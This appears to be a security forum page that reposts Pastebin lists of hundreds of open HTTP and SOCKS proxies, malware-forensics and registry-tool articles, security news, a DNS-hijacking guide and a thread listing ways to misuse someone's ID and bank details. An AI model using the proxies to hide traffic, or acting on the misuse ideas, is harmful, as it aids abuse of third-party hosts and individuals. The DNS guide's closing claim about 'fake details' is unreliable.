223.86.101.151:8123 223.86.101.168:8123 223.86.102.210:8123 223.86.102.252:8123 223.86.102.94:8123 223.86.11.57:8123 223.86.112.253:8123 223.86.113.222:8123 223.86.115.19:8123 223.86.116.135:8123 223.86.116.168:8123 223.86.116.31:8123 223.86.116.40:8123 223.86.117.212:8123 223.86.117.233:8123 223.86.117.246:8123 223.86.120.14:8123 223.86.127.146:8123 223.86.127.54:8123 223.86.130.161:8123 223.86.131.144:8123 223.86.132.189:8123 223.86.132.98:8123 223.86.134.146:8123 223.86.14.134:8123 223.86.14.165:8123 223.86.14.210:8123 223.86.14.78:8123 223.86.171.100:8123 223.86.171.244:8123 223.86.200.49:8123 223.86.203.102:8123 223.86.208.182:8123 223.86.209.13:8123 223.86.209.141:8123 223.86.211.234:8123 223.86.212.120:8123 223.86.213.115:8123 223.86.213.164:8123 223.86.213.196:8123 223.86.213.241:8123 223.86.213.72:8123 223.86.213.96:8123 223.86.216.22:8123 223.86.217.168:8123 223.86.218.4:8123 223.86.220.112:8123 223.86.220.177:8123 223.86.220.55:8123 223.86.221.54:8123 223.86.223.177:8123 223.86.223.254:8123 223.86.223.94:8123 223.86.3.82:8123 223.86.35.212:8123 223.86.4.124:8123 223.86.4.75:8123 223.86.5.166:8123 223.86.6.160:8123 223.86.6.188:8123 223.86.6.252:8123 223.86.65.143:8123 223.86.68.23:8123 223.86.68.38:8123 223.86.7.171:8123 223.86.7.231:8123 223.86.7.6:8123 223.86.75.113:8123 223.86.76.12:8123 223.86.76.121:8123 223.86.76.28:8123 223.86.8.215:8123 223.86.97.101:8123 223.86.99.213:8123 223.86.99.52:8123 223.87.159.75:8123 223.87.184.195:8123 223.87.185.213:8123 223.87.186.83:8123 223.87.4.20:3128 223.99.189.102:8090 23.99.192.109:3128 27.105.143.30:8088 27.105.16.69:9064 27.105.40.3:9064 27.106.42.231:9064 27.131.173.2:8080 27.131.47.131:8080 27.147.1.62:9064 27.147.170.248:9064 27.159.250.51:8118 27.2.132.62:9064 27.3.207.169:9064 27.3.23.15:9064 27.4.197.160:9064 27.49.68.102:9064 27.5.50.31:9064 27.51.133.72:9064 27.51.2.109:9064 27.6.8.140:9064 31.131.67.76:8080 31.15.48.12:80 31.220.42.77:8080 36.224.17.150:9064 36.224.214.91:9064 36.225.36.44:9064 36.225.88.73:9064 36.227.234.92:9064 36.229.4.29:9064 36.230.52.19:9064 36.230.53.197:8088 36.230.82.233:9064 36.231.127.164:8088 36.232.170.88:9064 36.232.42.12:9064 36.232.67.226:9064 36.232.95.237:9064 36.233.161.37:9064 36.233.36.47:9064 36.234.179.202:9064 36.234.32.34:9064 36.234.34.93:9064 36.237.57.57:9064 36.239.124.234:9064 36.250.69.4:80 36.250.74.87:80 36.250.74.88:80 36.44.120.115:8080 36.72.167.179:8080 36.74.72.205:3128 36.77.127.16:8080 36.80.167.119:9064 36.80.34.206:8080 36.81.3.5:515 36.84.142.63:9064 36.85.218.199:8080 36.88.169.184:9064 37.16.71.41:8080 37.187.112.134:3128 37.187.237.120:80 37.232.234.212:9064 37.239.46.26:80 37.239.46.50:80 37.49.137.243:3128 37.49.137.243:80 39.189.66.74:8123 39.65.225.89:8585 39.67.154.117:8585 41.188.49.159:8080 41.188.49.163:3128 41.188.49.164:3128 41.203.89.131:8080 41.222.196.52:8080 41.222.44.42:8080 41.223.119.156:3128 41.75.201.146:8080 41.78.208.93:8080 41.86.25.158:8080 46.119.222.118:3128 46.39.192.53:8080 46.40.37.161:80 46.40.38.110:8080 49.204.149.60:9064 49.204.184.132:9064 49.204.4.223:9064 49.204.49.46:9064 49.205.197.223:9064 49.205.26.143:9064 49.205.43.15:9064 49.206.171.156:9064 49.206.43.207:9064 49.207.108.80:9064 49.207.113.190:9064 49.207.126.213:9064 49.75.238.14:8123 5.102.170.20:3128 5.135.146.173:80 5.149.101.137:80 5.56.12.1:8080 5.56.61.185:19350 5.56.61.186:19350 54.148.68.88:3128 54.188.223.55:60884 54.244.254.219:3128 54.64.164.168:3128 54.77.29.185:3128 54.92.26.86:3128 58.115.107.63:9064 58.214.5.229:80 58.215.185.46:82 58.251.131.251:8888 58.251.78.71:8088 58.252.167.103:80 58.252.69.194:8888 58.253.238.242:80 58.67.159.50:80 59.115.137.231:8088 59.115.140.216:9064 59.115.145.50:9064 59.115.190.59:9064 59.115.237.190:9064 59.115.240.84:8088 59.120.220.130:9064 59.124.220.92:80 59.124.220.93:80 59.149.1.82:80 59.173.130.20:3128 59.41.47.148:18764 59.44.152.110:9999 59.46.72.245:8080 59.50.34.243:80 59.95.228.79:9064 60.194.100.51:80 60.195.3.180:8118 60.198.17.110:9064 60.206.246.66:8118 60.213.189.170:3988 60.214.219.28:8585 60.216.217.207:8585 60.25.36.63:18186 61.149.95.8:8888 61.154.2.156:8118 61.156.3.166:80 61.156.35.2:3128 61.157.126.37:18000 61.158.173.188:9999 61.184.192.42:80 61.223.185.223:9064 61.224.158.114:9064 61.224.201.11:9064 61.227.216.92:9064 61.227.54.167:9064 61.227.77.128:9064 61.227.79.216:9064 61.228.179.199:9064 61.228.61.88:9064 61.230.27.230:9064 61.231.194.225:9064 61.231.48.39:9064 61.232.6.164:8081 61.51.238.135:808 61.53.143.179:80 61.54.221.201:3128 61.62.205.246:8088 61.62.206.28:8088 61.62.5.46:8088 61.64.179.158:9064 61.7.191.89:9064 61.8.70.114:8080 62.103.107.9:80 62.75.229.121:3128 62.82.23.1:8080 64.156.195.147:3128 64.156.195.150:3128 64.31.22.131:7808 64.31.22.131:8089 64.31.22.143:7808 64.31.22.143:8089 65.49.14.147:3080 65.49.14.147:3128 66.135.33.230:3128 66.162.208.10:3128 66.193.69.30:8080 67.148.11.168:443 67.207.166.174:7808 67.207.166.174:8089 69.10.137.139:8000 69.163.47.19:8118 69.197.148.18:8089 69.64.49.7:3128 70.99.146.246:7004 74.207.242.38:3128 75.133.69.131:8080 77.236.152.177:13076 77.236.155.170:13076 77.236.156.77:13076 77.236.157.70:13076 77.245.171.70:3128 77.247.33.142:13076 77.75.88.200:8080 77.89.244.62:80 78.130.201.110:8080 79.106.108.139:8080 79.143.181.127:3128 80.64.81.34:3128 81.138.80.9:8080 81.20.145.100:3128 82.166.34.48:8085 82.208.136.106:3128 82.223.148.124:10150 82.223.148.124:10732 83.222.221.137:8080 83.241.46.175:8080 85.202.7.27:8080 85.217.255.155:8080 85.234.20.131:3128 85.236.25.20:9090 85.236.25.21:9090 85.236.25.22:9090 85.29.51.15:3128 86.51.186.34:3128 87.252.230.142:80 88.132.82.236:8088 88.159.116.151:80 88.198.24.108:3128 89.180.94.61:9064 89.181.63.116:9064 89.232.139.253:80 89.46.101.122:7808 89.46.101.122:8089 91.121.192.178:3128 91.121.52.75:8118 91.135.22.26:8080 92.114.141.239:3128 93.115.10.11:8080 93.116.49.221:8080 93.123.39.112:9064 93.81.252.75:8080 94.140.213.234:3128 94.142.109.193:10180 94.191.24.54:13076 94.203.226.50:80 94.247.174.121:18080 94.247.174.124:18080 94.247.174.125:18080 95.69.54.35:9064 [/LIST] Sursa: 09-12-14 | Fast Proxy Server List (3678) - Pastebin.com

09-12-14 | VIP Socks 5 Servers (41) Checked & filtered premium servers 101.176.109.233:49679 107.171.227.132:27345 124.160.35.2:808 173.48.85.6:47464 173.74.93.133:48641 174.1.13.143:50115 180.153.139.246:8888 198.27.67.24:53092 199.201.121.162:443 199.91.228.197:42149 207.190.107.166:37686 217.133.47.124:18280 217.172.179.88:13729 24.200.180.120:25389 42.51.152.102:9050 47.22.36.178:25802 58.165.230.93:34690 61.147.67.2:9125 62.201.214.203:3128 64.147.215.108:2777 69.113.219.131:26587 69.253.214.65:22130 70.183.2.100:46743 71.117.166.239:36644 71.177.42.105:41630 71.183.79.46:38565 72.133.32.186:46161 72.93.108.40:40722 73.55.188.147:34498 76.104.153.62:54598 78.39.178.2:443 79.180.131.50:5120 81.0.240.113:9050 82.194.76.183:10080 83.143.27.42:443 87.106.48.142:10080 88.178.116.157:60871 91.246.235.157:16122 96.33.210.159:23739 96.42.246.8:31949 98.193.56.63:42666 Sursa: 09-12-14 | VIP Socks 5 Servers (41) - Pastebin.com

09-12-14 | Free Scrapebox Google Passed HTTP Proxies (109) Checked & filtered (Timeout 45) 198.27.120.118:8082 5.149.36.1:3128 189.104.162.98:80 189.70.180.159:8080 41.129.74.215:8080 177.23.151.146:8080 141.255.161.24:3128 87.252.246.22:3128 187.5.122.231:8080 194.190.110.222:3128 190.201.75.225:3128 106.187.92.124:80 219.92.6.245:3128 183.89.40.48:3128 201.79.63.143:8080 2.49.99.108:8000 80.58.29.164:80 123.255.249.194:8081 202.29.240.161:8080 186.222.100.54:3128 180.183.67.20:3128 183.89.43.231:3128 110.77.205.130:3128 176.9.216.184:80 200.11.216.67:8080 198.27.115.66:8080 180.183.86.3:80 41.205.107.213:8080 14.139.120.124:8080 118.99.126.149:8080 87.236.211.37:3128 110.139.11.59:80 201.65.24.245:3128 174.129.103.50:80 61.8.77.74:3128 71.12.182.106:3128 209.222.151.21:3128 190.236.191.84:8080 23.22.233.36:3128 42.121.17.194:80 110.136.191.216:3128 42.121.18.43:8082 80.94.112.132:8080 205.213.195.80:8080 198.27.114.173:3128 49.212.149.114:8090 37.251.64.213:80 46.209.63.37:3128 41.42.205.214:8080 94.31.68.174:80 41.205.107.213:80 195.138.68.191:8085 78.46.63.51:8084 180.94.88.58:8080 5.152.193.142:8081 210.101.131.231:8080 41.129.3.67:8080 54.247.167.164:8088 89.233.104.79:8081 190.73.138.126:8080 186.207.70.52:3128 201.248.231.183:8080 2.51.1.193:8118 118.99.75.22:8080 190.233.121.110:8080 180.94.88.58:80 186.94.82.195:8080 61.8.75.211:8080 210.64.12.2:80 202.137.26.102:3128 88.248.13.15:8086 180.183.237.240:3128 201.18.4.213:8080 183.89.41.120:3128 175.103.44.92:80 176.31.165.26:3128 180.211.95.190:80 2.51.220.218:8118 180.247.133.241:80 190.75.175.197:8080 180.246.242.133:8080 180.253.62.21:80 201.79.204.208:80 46.211.74.226:54321 180.183.62.201:3128 190.207.128.197:8080 121.15.164.123:8088 183.89.68.208:3128 186.160.17.87:8000 200.181.125.43:3128 190.90.199.130:8080 222.124.35.116:8080 183.89.80.114:3128 49.128.176.178:3128 119.42.80.11:8080 41.45.252.67:80 190.42.202.109:8080 5.9.236.123:443 118.97.212.162:8080 180.183.11.216:3128 203.223.47.215:3128 177.35.37.94:8080 186.93.98.204:8118 180.183.207.183:3128 183.89.85.100:3128 41.236.173.11:3128 121.96.166.72:3128 41.204.250.62:8080 195.175.83.146:3129 Sursa: 09-12-14 | Free Scrapebox Google Passed HTTP Proxies (109) - Pastebin.com

Super. Un tutorial mai detaliat legat doar de java bytecode / ASM stie cineva?

Cere sa iti dea PM cine are nevoie. O sa iti manance timp sa le raspunzi, dar macar stii cine e retardatul.

Registry Dumper – Find and Dump Hidden Registry Keys Posted on December 6, 2014 by darryl The cybercriminals behind Poweliks implemented two clever techniques in their malware. The first was leveraging rundll32.dll to execute Javascript and the second was using a method to hide/protect their registry keys. I’ll be focusing on the second method. The technique of hiding/protecting registry keys using a non-ASCII character goes all the way back to over a decade ago. It’s remarkable in a sense that after all these years, it still works on the latest Windows platform. Here we see the built-in Windows Registry Editor choke on the hidden/protected key after infecting the computer with Poweliks. Clicking past the error dialog, you should see something like this. This default key is exposed and fully downloadable/viewable. However, there’s another key that contains the “trigger” that’s not visible. If we need to research what this particular malware is doing, we ought to find out what else is hiding there. For that we need to find a tool to help us view these hidden registry keys. With online registry viewers/editors, you can get mixed results. Some seem to work well but lack some basic functionality like exporting keys as text. Others get confused and display the wrong key. Offline registry viewers/editors fare much better and offer consistent results. However, you will need to log into a separate account on the computer and use this tool. Or you have to copy the registry off of the infected machine and view it on a computer with the tool installed. I prefer to do an initial triage on the live machine and get to the data as quickly as possible. Since I couldn’t find a portable, online tool that had the features I wanted, I figure I would try my hand at creating one. The tool is called Registry Dumper and uses a DLL which interacts with the registry via NT native APIs that was written by Hoang Khanh Nguyen. This tool allows you to scan for null characters in a given path. It will iterate through the path to find all the keys with nulls in them. If you click on the “Show in Hex” checkbox, you can see the key names in hex. Here you will notice that the second entry’s name is “010001” which is equivalent to 0x01 0x00 0x01. This is impossible to view, edit, or delete using the Windows’ Registry Editor. From here you can copy/paste the path over to the left side and dump the keys to a text file. Here’s the text file containing all the key values in the given path. With this tool you can create hidden keys for testing purposes. And if you wanted to delete that impossible-to-remove key, you can use this tool by entering “[x01][null][x01]” as the key name. The obfuscated data you see there is the result of running it through Microsoft Script Encoder. To deobfuscate it, you can use an online decoder or download a VBS decoder. A fellow by the name of Lewis E. Moten III wrote a decoder program. I repackaged his function in the following tool. Here is the decoded version. You will notice that I didn’t have to strip away everything else but the encoded string. The decoder program will look for the start and end markers of the encoded text and replace it with the decoded result. Just recently, a newer variant of Poweliks was found. It uses a different registry hiding technique based on user permissions. You can read about it here. If you use this tool to access one of these keys, you will get an error message saying that the key doesn’t exist. It does exist but it’s just that it doesn’t have the rights to view it. Here’s the permission properties of the key using the Windows Registry Editor. Notice that the current user has no read permissions. You can still use this tool to dump the keys but you first need to grant permission to the user account that’s running the tool. Just click on the Set Permission to User button and the permission is changed to allow the current user the rights. Now you can access the key: Here is the dump of the keys: And the decoded string: By the way, that Javascript in the “(Default)” key can be deobfuscated easily using Converter. You will see that the value in between the quotes are shifted over by one character (e.g. the word hello = ifmmp). Just enter the value “-1? and click on the SHIFTx button (or you can click once on the minus button on the right). You can download both tools here. Sursa: Registry Dumper – Find and Dump Hidden Registry Keys | Kahu Security

US lawmaker pushes back against FBI backdoor calls David Meyer Dec. 5, 2014 - 12:58 AM PST U.S. Senator Ron Wyden (D-OR) has introduced a bill that would stymie almost any attempt by a government agency to force device manufacturers and app developers to install backdoors for surveillance purposes. Wyden’s Secure Data Act, introduced on Thursday, follows calls by FBI chief James Comey for companies such as Apple and Google to give his agents a way through their encryption mechanisms, which have been tightened in the wake of Edward Snowden’s NSA revelations and episodes such as the celebrity iCloud hack. Apple’s most recent move, for example, makes it impossible for the company to bypass the passcode on a user’s iPhone for the benefit of law enforcement or intelligence agencies. Wyden’s bill gives an exemption to CALEA, the U.S. law that already compels carriers and router manufacturers to install “lawful intercept” capabilities, but beyond that it states: … no agency may mandate that a manufacturer, developer, or seller of covered products design or alter the security functions in its product or service to allow the surveillance of any user of such product or service, or to allow the physical search of such product, by any agency. “Covered products” means any hardware or software made available to the general public, so the bill would arguably not cover, say, flawed random number generators. Wyden’s main impetus for this move, the NSA critic said in a statement, was that backdoors inherently weaken the security of the systems they’re installed in. He also reckons that backdoor mandates are a disincentive to innovation in “strong new data security technologies”, and harmful to trust in American products and services. “Strong encryption and sound computer security is the best way to keep Americans’ data safe from hackers and foreign threats,” he said in the statement. “It is the best way to protect our constitutional rights at a time when a person’s whole life can often be found on his or her smartphone. And strong computer security can rebuild consumer trust that has been shaken by years of misstatements by intelligence agencies about mass surveillance of Americans.” It’s interesting, if unsurprising, that Wyden’s bill gives a get-out to CALEA. His own statement cites the 2005 case of senior Greek politicians being illicitly tapped, using an Ericsson lawful intercept feature, as an example of how backdoors can compromise a system’s security for the benefit of more people than they’re supposed to. Earlier this year, security researchers also identified critical weaknesses in some companies’ lawful intercept products. Sursa: https://gigaom.com/2014/12/05/us-lawmaker-pushes-back-against-fbi-backdoor-calls/

Kaspersky: That 2 years we took to warn you about Regin ? We had GOOD REASON Security community: We only saw fragments... By John Leyden, 5 Dec 2014 Kaspersky Lab has responded to criticism that security vendors took years too long to spot Regin, a recently discovered strain of ultra-sophisticated (and probably state-sponsored) spyware. Regin is a software framework rather than an individual malicious code sample. Security vendors have until recently only seen fragments of the whole, making analysis difficult. Kaspersky Lab explained the two-year delay in releasing info about the Regin cyberweapon by comparing its work to an investigation by police. Security research - not unlike law enforcement investigations - requires meticulous scrutiny and analysis, and in many cases, it's important to watch the crime unfold in real-time to build a proper case. In our case, without unlimited resources and the fact that we're tracking multiple APT actors simultaneously (Careto/Mask, EpicTurla, Darkhotel, Miniduke/Cosmicduke, to name a few), this becomes a process that takes months, even years, to gain a full understanding of a cyber-operation. Sean Sullivan from F-Secure compares APT research to the work of paleontologists that find some bones of a dinosaur. Everyone may have a bone, but nobody has the full skeleton. Kaspersky picks up this analogy and runs with it. "In the case of Regin, what we first discovered in 2012 was a slightly damaged bone from unknown part of a monster living in a mysterious mountain lake," the firm said in a blog post on its official Securelist blog. The Russian security firm goes on to firmly deny withholding information about and detections of Regin at the request of governments, customers or anyone else. Security firm Symantec was the first to publish research about Regin around two weeks ago. The cyber espionage tool has been used for the past six years to spy on business and private targets. As previously reported, Symantec has previously come out swinging at accusations it was tardy in releasing information about Regin. Neither Kaspersky's or Symantec's denials are likely to silence either conspiracy theorists or anti-virus naysayers, of course. It's only possible to note that the offenders have a big advantage over defenders in cyber-espionage operations, and huge resources at their disposal, so the length of time taken to detect Regin is poor evidence of complicity between security software firms and cyber-spies. There are precedents for the delay in releasing information about Regin, as Kaspersky Lab points out. Like Regin, sometimes we find that we had been detecting pieces of malware for several years before realizing that it was a part of global cyber-espionage campaign. One good example is the story of RedOctober. We had been detecting components of RedOctober long before we figured out that it was being used in targeted attacks against diplomatic, governmental and scientific research organisations. Regin is most likely the work of an advanced nation state using multiple levels of encryption to obfuscate itself and other trickery in order to avoid detection, say securobods. Advanced functionality in Regin includes the ability to directly monitor mobile phone traffic, with Symantec reporting that 28 per cent of the samples seen attacked telecoms backbone infrastructure. Once installed into a computer, Regin can carry out a variety of malign actions – including capturing screenshots, monitor keystrokes, steal passwords and even recovering deleted files. ISPs, energy companies, airlines and research-and-development labs are among its victims. What really marks the Regin platform out as something special is its ability to attack GSM and take over the management functions of mobile networks. The attackers were able to obtain credentials that would allow them to control GSM cells in the network of a large cellular operator, according to Kaspersky Lab. This gave attackers the access to information about which calls are processed by a particular cell, along with the ability to redirect these calls to other cells, activate neighbour cells and perform other offensive actions. Samples of Regin were injected into systems at Belgian telecoms outfit Belgacom around 2010, and builds of the spyware has been circulating for at least six years. Security firm G Data said it was aware of attacks on targets in 18 countries, including Germany, Russia, Syria and India. The Belgacom link is evidence that GCHQ might have had a hand in its creation but this is a bit circumstantial and who created Regin remains something of a mystery. This and the fact that the modules are called LEGSPIN could be a diversionary tactic. What is curious is that none of the “Five Eyes” countries (Australia, Canada, New Zealand, the UK, and the United States) make an appearance in the list of victims. ® Sursa: Kaspersky: That 2 years we took to warn you about Regin ? We had GOOD REASON • The Register

In timpul tau liber, sau ca parte din job?

Good guy spam, poze cu gagici

E mai mult o curiozitate de-a mea. Sa presupunem ca ai datele publice: 1. Numele complet 2. Cod numeric personal 3. Serie si numar buletin 4. Adresa de acasa 5. Adresa de mail 6. Adresa IP 7. Cont IBAN 8. Cont Paypal Ce poti pati in cazul in care cineva are aceste date si iti vrea raul? Raspundeti punctual: 1. Gaseste Facebook si poate alte informatii 2. Cere informatii despre cont in banca 3. Inchide abonamentul de telefonie 4. Vine la tine si se caca la usa 5. Gaseste informatii despre tine: conturi, interese 6. Afla zona in care stai, cauta loguri ale accesarilor 7. Afla banca la care ai cont 8. Afla numele tau trimitand 1 euro (cred) Sunt doar cateva opinii. Voi ce parere aveti?

How to Stop DNS Hijacking You have (probably more than once in your life) keyed in a familiar domain name and ended up in an entirely different page that was not even close to what you had expected. Chances are that you never even noticed the abnormality and you went ahead retyping the domain name or making a custom search of your preferred destination on Google. Well, what you have never realized is that you may have been a victim of Domain Name System Hijacking or redirection. Apparently, DNS hijacking is a growing threat, and no single organization is large enough for DNS attacks. Not long ago, a hackers’ group known as the Iranian Cyber army took Twitter by storm, after having successfully managed to redirect domain requests from Twitter.com to its own hosted IP addresses. Similarly, on Thanksgiving day, the Syrian Electronic Army hijacked network traffic to major media outlets sites including the Independent , the Telegraph and the Canadian Broadcasting Corporation, just to mention a few. So, What is DNS Hijacking? Technically, Domain Name System Hijacking intercepts legitimate DNS requests from the user and matches them to compromised IP addresses hosted on the attacker’s servers. Ideally, websites on the World Wide Web are identified using a combination of numbers known as IP addresses, which are unique to every single site. To save you from the hassle of having to remember each IP address like you do with all your passwords, all IP addresses are given a custom domain name, which is easy to remember. In simple terms, you can access the web by searching its domain name or through its IP address if you can recall it, although you won’t. When it comes to DNS hijacking, the attacker launches a man-in-the-middle-like attack, which subverts the user’s DNS requests and directs them to their own compromised DNS server. The basic function of a DNS server is to match the user’s DNS request with the correct IP addresses. However, an attackers’ compromised DNS server uses a DNS switching Trojan to attach the wrong IP address to the user’s DNS request, therefore directing him to a spoofed website. Such attacks are known as Pharming and could be employed by scammers in a phishing campaign aimed at stealing personal information. Notably, DNS hijacking is not a pattern of malicious hackers only. Legitimate ISP providers also engage in the ill-feting activity to suit their own selfish interests, including placing ads or collecting statistics for Big Data Analysis. Ordinarily, you should come up with a “server not found” error message every time you query a non-existent domain name. However, ISP providers have perfected the art of manipulating DNS (NXDOIMAN) responses and directing users to their ad-ridden IP addresses. DNS Hijacking is not only irritating, but could also expose the user to potentially dangerous cross-site scripting attacks, besides violating RFC international standard for DNS (NXDOMAIN) responses. A fine example of an ISP “behaving badly” and somehow manipulating Internet users without their consent (otherwise, it would not be manipulation, right?) is that of Verizon and its Perma Cookie. EFF has heavily criticized the abuse of personal information that has been made by Verizon Wireless, and this is just a drop in the ocean of non-consensual traffic redirection and tracking occurring daily on the web. Shore Up DNS Security Whether it’s a DNS cache poisoning or simple DNS blocking by the ISP providers, no one wants to traverse the web at gun point. In a Cache Poisoning attack, the hacker secretly injects false addressing data into DNS resolvers, enabling the attackers to redirect legitimate DNS requests away from legitimate websites to compromised DNS servers. The clandestine activity can go undetected for ages, allowing the attack to siphon huge chunks of sensitive information, including all Passwords and Usernames. The first step in fortifying your DNS security is to deploy Domain Name System Security Extensions (DNSSEC). This is a security standard that allows the Domain owners to physically monitor traffic to their domain. The owners are able to register their Domains’ zones, enabling DNS resolvers to verify the authenticity of all DNS responses. Anyone with .org domains can now register them to domain registers through companies such as GoDaddy. DNSSEC will also enable you to manage customer identities. Configure Your DNS Settings In reality, the solution to your DNS solution lies within. If your ISP provider’s DNS server does not live up to its security expectations, ditch that for an alternative third party DNS, such as OpenDNS, NortonDNS or DNSResolvers. Here is how to configure your DNS settings of your operating system and prevent DNS hijacking: For Windows Users: Open the control panel. Under “Network and Internet” click on “Network status and tasks” and proceed to the Wireless connection button on the far right of your window. Under the “Wireless Network Connection Status”, click on “Properties” and go ahead to select “Internet Protocol Version 4 (TCP/IPv4) properties.” Now you should be able to give an alternative DNS address of your choice. Almost at the bottom of the dialog box, select the “Use the following DNS server addresses” button and fill out your alternate DNS server IP information (e.g. 8.8.8.8 for Google or 205.210.42.205 for DNSResolvers). Click OK and your alternate DNS will now be active by default. For Ubuntu Users: On the system menu, click on “Network connections” and select “Preferences”. Now you’re at a dialog box with three optional tabs. If you want to configure the Ethernet connection, click on the “Wired” button and then specify your network from the interface list. For a wireless connection, click on the “Wireless connection” button and select your network. Then click on the “Edit” button. Select the IPv4 Settings tab and, if the Automatic (DHCP) is the selected method, then proceed to select “Automatic (DHCP) addresses only”. In the Dialog box that appears, key in your DNS IP information (e.g. for Google type 8.8.8.8 8.8.4.4 and then follow up with the changes). You may be required to set a password of your choice. Repeat the above steps for any network you wish to modify. After having followed the guidelines provided above in order to amend your settings, you will see that the alternative DNS servers you use work wonders for your privacy. Without having the proper information displayed on your computer for anyone to track down on, DNS hijacking cannot happen. Instead, your wireless connection will be completed using fake details, and therefore you will be thoroughly protected at all times while surfing the web! By Ali Qamar|December 5th, 2014 Sursa: How to Stop DNS Hijacking - InfoSec Institute

[h=2]Improving Your Malware Forensics Skills[/h]ednesday, June 25, 2014 Posted by Corey Harrell By failing to prepare, you are preparing to fail. ~ Benjamin Franklin In many ways preparation is key to success. Look at any sporting event and the team who usually comes out on top are the ones who are better prepared. I'm not just referring to game day; I'm also talking about the coaching schemes and building a roster. Preparation is a significant factor to one's success in the Digital Forensic and Incident Response field. This applies to the entire field and not just malware forensics, which is the focus of this post. When you are confronted with a system potentially impacted with malware your ability to investigate the system successfully depends on your knowledge, experience, and toolset. This is where there is a conundrum. There is a tendency for people not to do malware cases (either through being hired or within an organization) due to a lack of knowledge and experience but people are unable to gain knowledge and experience without working malware cases. The solution is through careful preparation one can acquire knowledge, experience, and toolset that can eventual lead to working malware cases. This post outlines the process I used and currently use to improve my malware forensics skills. The process described in this post helped me to develop the skills I have today. I even use a similar process to create test systems to help develop malware forensic skills in others (if you read this blog then you have already seen the benefits of doing this). With that said, what I am describing is a very time consuming process. However, if you decide to replicate the path I took it will be worth it and along the way you'll improve your malware forensic skills. This post is specifically directed at those wanting to take this step using their own resources and time. Those wanting to lose themselves in the DFIR music. [h=2]Process, Process, Process[/h] Malware forensics is the process of examining a system to: find malicious code, determine how it got there, and what changes it caused on system. The first place to start for improving one's skills is by exploring the process one should use. The purpose of starting with the process is twofold. First and foremost it is to understand the techniques, examination steps, and knowing what to look for. The second reason is to explore the various tools to use to carry out the process. There are only a few resources available specific to this craft such as: Malware Forensics Field Guide for Windows Systems and Windows Forensic Analysis Toolkit, Fourth Edition. In addition, this has been an area on my radar to add one more book to the discussion but in the meantime my jIIr methodology page outlines my process and links to various posts. My suggestion is to first review the methodology I put together which is further explained in the posts: Overall DF Investigation Process and End to End Digital Investigation. Afterwards, review one or two of the books I mentioned. As you work your way through this material pay attention to the malware forensic process the author uses or references. When it is all said and done and you completed reviewing what you set out to then document a malware forensic process you want to use. If this sounds familiar then you either started reading jIIr from the beginning or you are one of my early followers. This is exactly what I described in my second and third posts Where to start? and Initial Examination Steps & First Challenge that I wrote almost four years ago. However, a lot of time has passed since I wrote those posts and I improved my process as outlined below: - Examine the master boot record - Obtain information about the operating system and its configuration - Examine the volatile data - Examine the files on the system that were identified in volatile data - Hash the files on the system - Examine the programs ran on the system - Examine the auto-start locations - Examine the host-based logs - Examine file system artifacts - Malware searches - Perform a timeline analysis - Examine web browsing history - Examine specific artifacts - Perform a keyword search - Examine suspected malicious files [h=3]Tools, Tools, Tools[/h] After the process you want to use is documented then the next step is to identify the tools you will use in each examination step. There are numerous tools you can use; the tools mentioned by the authors in the reference material, tools talked about the bloggers in my blog roll, or tools you already have experience with. To be honest, what tools someone should use depends. It really depends on what you prefer and are comfortable with. The tools I started out with are not the same ones I use today; the important thing is each tool helped me learn and grow. Pick any tools you want as a starting point and over time you will start to see the pros and cons of various tools. [h=2]Testing Environment[/h] With your process and tools selected, now it is finally time to stop the researching/documenting and to actually use the process you documented and tools you selected. To do this you first have to set up a testing environment. There is an inherit risk to using virtualization for the testing environment; the malware may be virtualization aware and behave differently than on real computer. However, despite this risk I highly recommend to use virtualization as your testing environment. It's a lot faster to create multiple test systems (by copying virtual machines) and the snapshot feature makes it easier to revert mistakes. There are various virtualization options available with great documentation such as VirtualBox and VMware. Pick a virtualization platform and install it using the provided instructions. [h=3]Creating your VMs[/h] Another decision you'll need to make is what operating systems to perform your testing on. This not only includes the operating system versions (i.e. Windows 7 vs Windows 8) but what processor to use as well (32 bit vs 64 bit). I ended up selecting VMware for the virtualization software and Windows 7 32 bit as the testing platform. You will need to create your first VM by installing the operating system of your choice. After the installation try to make things easier for the system to be compromised. First disabled security features. This includes the built-in firewall and the user account control. Next make sure the account you are using has administrative privileges. Next you will want to make your test system a very juicy target. To do this you'll need to install vulnerable client-side applications including: Adobe flash, Adobe Reader, Java, Silverlight, Microsoft Office, Internet Explorer, and a non-patched operating system. One place to grab these applications is Old Apps and to determine what versions to install pick the ones targeted by exploit kits. At a minimum, make sure you don't patch the OS and install Java, Silverlight, Adobe reader, and Adobe flash. This will make your VM a very juicy target. After the VM is created and configured then you'll want to make multiple copies of it. Using copies makes things easier during analysis without having to deal with snapshots. [h=2]Manually Infecting Systems[/h] The first approach to improving your skills is a manual method to help show the basics. The purpose is to familiarize yourself with the artifacts associated with malware executing in the operating system you picked. These artifacts are key to be successful in performing malware forensics on a compromise system. The manual method involves you infecting your test VM and then analyzing it to identify the artifacts. The manual method consists of two parts: using known and unknown samples. However, before proceeding there is very important configuration change. The virtual machine's network configuration needs to be isolated to prevent the malware from calling home or attacking other systems. [h=3]Using Known (to you) Samples[/h] Starting out it is better to practice with a sample that is known. By known I mean documented so that you can reference the documentation in order to help determine what the malware did. Again, we are trying to improve our ability to investigate a system potentially impacted with malware and not trying to reverse the malware. The documentation is just to help you account for what the malware did to make it easier to spot the other artifacts associated with the malware running in the operating system. The way to find known samples really depends. You could find them using information on antivirus websites since they list reports using their malware naming convention. For example, Symantec's Threat Listing, Symantec's Response blog, Microsoft's Threat Reports, or Microsoft's Malware Encyclopedia to name a few. These are only a few but there are a lot more out there; just look at antivirus websites. The key is to find malware with a specific name that you can search on such as Microsoft's Backdoor:Win32/Bergat.B. Once you find one you like then review the technical information to see the changes the malware makes. I suggested finding known malware by names first because there are more options to do this. A better route if you can find it is to use a hash of a known malware sample. Some websites share the hash of the sample they are discussing but this doesn't occur frequently. A few examples are: Contagio Malware Dump, KernelMode.info, or MxLab blog. Another option is to look at the public sandboxes for samples that people submitted such as Joe Sandbox or one listed on Lenny Zelster's automated malware analysis services list. After you pick a malware name or hash to use then the next step is to actually find the malware. Lenny Zelster has another great list outlining different malware sample sources for researchers. Anyone one of these could be used; it just needs the ability to search by detection name or hash. I had great success using: VirusShare, Open Malware, Contagio Malware Dump, and KernelMode.info. Remember the purpose of going through all of this is to improve your malware forensic skills and not your malware analysis skills. We are trying to find malware and determine how the infection happened; not reversing malware to determine its functionality. Now that you have your sample just infect your virtual machine (VM) with it and then power it down. If the VM has any snapshots then delete them to make it easier. Now that you have an infected image (i.e. the vmdk file) you can analyze it using the process you outlined and the tools you selected. At this point you 